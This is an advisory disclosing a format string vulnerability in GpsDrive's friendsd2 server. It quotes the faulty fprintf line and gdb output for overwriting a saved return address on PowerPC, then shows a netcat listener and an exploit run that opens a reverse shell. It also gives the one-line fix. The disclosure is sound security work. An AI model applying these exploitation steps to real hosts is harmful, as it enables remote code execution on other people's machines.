DMA[2005-1104a] - 'GpsDrive friendsd2 format string vulnerability'
Author: Kevin Finisterre
Vendor: https://www.gpsdrive.cc/
Product: 'GpsDrive'
References: https://www.digitalmunition.com/DMA[2005-1104a].txt

Description: 
GpsDrive is a car (bike, ship, plane) navigation system. It can display positioning information 
provided from a NMEA capable GPS receiver on a zoomable map. Map file autoselecting is done based 
on the current position and the prefered map scale. All Garmin GPS reveivers with a serial output 
should be usable, as well as other GPS receivers that support NMEA protocol. GpsDrive was written 
in C with use of the GTK+ graphic toolkit and it runs on Linux and FreeBSD. With minimal work it 
is also posisble to run GpsDrive on Windows and on OSX. 

GpsDrive comes with a server program called friendsd which acts as server for the position of your
friends. You see the position of your friends as a car symbol on the map, including the name, time, 
day of week and the speed of his last connection. A blue arrow shows the last reported direction of 
your friend. Fritz Ganter has blatantly stated in the man page that "The (friendsd) server was NOT 
tested for security". 

Please not that friendsd no longer runs as root since the last round of security patches. 
kfinisterre:/home/kfinisterre# friendsd2
server: please don't run me as root

The friendsd server does contain an obvious format string issue complements of a bad fprintf() call. 
./src/friendsd.c:367:     fprintf (stderr, txt);

Exploitation of this bug is fairly trivial, on powerpc I chose to overwrite a saved return address
as shown below.  

First I just crashed the program and went to frame 2
0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
(gdb) bt
#0  0x0f67d1e0 in vfprintf () from /lib/tls/libc.so.6
#1  0x0f67cc74 in vfprintf () from /lib/tls/libc.so.6
#2  0x0f6825d0 in fprintf () from /lib/tls/libc.so.6
#3  0x100024b8 in dg_echo ()
#4  0x10002f28 in main ()

Next I grab the address of Arglist for frame 2 and overwrite that +4
(gdb) i f
Stack level 2, frame at 0x7fffad70:
pc = 0xf6825d0 in fprintf; saved pc 0x100024b8
called by frame at 0x7fffae00, caller of frame at 0x7fff8700
Arglist at 0x7fffad70, args:
Locals at 0x7fffad70, Previous frame's sp in r1

(gdb) x/a 0x7fffad70+4
0x7fffad74:     0xf6825d0 <fprintf+112>  (overwrite this)

animosity:/home/kfinisterre$ nc -l -p 31337 -vvv
listening on [any] 31337 ...

animosity:/home/kfinisterre$ ./gpsdrive-ex-long-ppc.pl
$VAR1 = {};

192.168.1.1: inverse host lookup failed: Unknown host
connect to [192.168.1.1] from (UNKNOWN) [192.168.1.1] 3349
id;
uid=1000(kfinisterre) gid=1000(kfinisterre)
groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(kfinisterre)

Workaround: 
Stop using friendsd2! or simply change the above mentioned fprintf() call to the following. 
fprintf (stderr,"%s",txt);

Timeline associated with this bug:
I emailed Fritz Ganter (ganter@ganter.at) at least twice about this and got no response. 

-KF